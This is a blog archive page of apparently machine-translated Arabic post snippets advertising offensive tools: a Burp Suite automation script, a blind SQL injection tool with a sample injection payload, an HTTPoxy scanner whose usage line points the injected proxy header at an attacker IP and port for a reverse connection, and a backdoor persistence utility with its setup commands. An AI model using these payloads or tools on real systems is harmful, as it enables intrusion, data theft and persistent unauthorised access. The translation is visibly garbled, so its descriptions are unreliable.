Articles

Affichage des articles du mai 26, 2018
Image
               بوربا - أداة أتمتة جناح تجريف و  التجشؤ جناح  أداة أتمتة مع التكامل سلاك.  المتطلبات تجشؤ للراحة-API تجشؤ جناح الفنية slackclient استعمال $ python burpa.py -h ################################################### __ / /_ __ ___________ ____ _ / __ \/ / / / ___/ __ \/ __ `/ / /_/ / /_/ / / / /_/ / /_/ / /_.___/\__,_/_/ / .___/\__,_/ /_/ burpa version 0.1 / by 0x4D31 ################################################### usage: burpa.py [-h] [-a {scan,proxy-config,stop}] [-pP PROXY_PORT] [-aP API_PORT] [-rT {HTML,XML}] [-r {in-scope,all}] [-sR] [-sAT SLACK_API_TOKEN] [--include-scope [INCLUDE_SCOPE [INCLUDE_SCOPE ...]]] [--exclude-scope [EXCLUDE_SCOPE [EXCLUDE_SCOPE ...]]] proxy_url positional arguments: proxy_url Bur
Image
BSQLinjector - أداة استغلال حقن SQL أعمى BSQLinjector هو أداة استغلال حقن أعمى SQL مكتوبة في روبي. ويستخدم طريقة أعمى لاسترداد البيانات من قواعد بيانات SQL.  أوصي باستخدام "--test" التبديل لرؤية بوضوح كيف يبدو الحمولة قبل تكوينها إلى التطبيق. خيارات: --file Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt) --pattern Mandatory - Pattern to look for when query is true. (--pattern=truestatement) --prepend Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement' +from+table+where+col%3d'value'+and+substr(password," --append How to end our payload. For example comment out rest of SQL statement. (--append='#) --schar Character placed around chars. This character is not used while
Image
HTTPoxyScan - HTTPoxy استغلال الماسح الضوئي PoC / Exploit  الماسح الضوئي  لمسح ملفات CGI الشائعة على عنوان URL الهدف لثغرة HTTPX.  Httpoxy هي مجموعة من  الثغرات الأمنية التي تؤثر على كود التطبيق الذي يعمل في CGI أو البيئات المشابهة لـ CGI.  لمزيد من التفاصيل ، انتقل إلى  https://httpoxy.org  . المتطلبات: يتطلب ncat لإنشاء  جلسة  عكسية الاستعمال: ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000 سيؤدي هذا إلى مسح  https://target.com  بقائمة من ملفات CGI الشائعة أثناء إدخال رأس Proxy مرة أخرى إلى عنوان IP معيّن: PORT.  سوف  يستمع المستمع  العكسي  إلى الاتصال الوارد لتأكيد أن  الموقع  البعيد عرضة للخطر. تنزيل HTTPoxyScan
Image
BackdoorMe - قوية التلقائي Backdooring المنفعة BackdoorMe هو أداة قوية لصناعة السيارات الخلفية التي يمكنك استخدامها للحفاظ على الوصول إلى مستتر لجهاز الكمبيوتر. ملاحظة:   BackdoorMe ليست أداة للوصول إلى الجذر - فقط الحفاظ على هذا الوصول بمجرد اكتسابها. يتم تقسيم BackdoorMe إلى قسمين: backdoors والوحدات. إن backdoors عبارة عن قصاصات صغيرة من الكود والتي تستمع على المنفذ وتعيد التوجيه إلى مترجم ، مثل bash.  هناك العديد من backdoors مكتوبة بلغات مختلفة لإعطاء متنوعة. تجعل الوحدات النمطية backdoors أكثر فعالية من خلال تشغيلها في كثير من الأحيان ، على سبيل المثال ، كل بضع دقائق أو عند تشغيل الكمبيوتر.  هذا يساعد على إقامة المثابرة. برهنة: اقامة لبدء BackdoorMe ، تأكد أولاً من أن لديك التبعيات المطلوبة. لبيثون 3.5+: $ sudo apt-get install python3 python3-pip python3-tk nmap $ cd backdoorme/ $ virtualenv --python=python3.5 env $ source env/bin/activate (env) $ pip install -r requirements.txt لبيثون 2.7: $ sudo pytho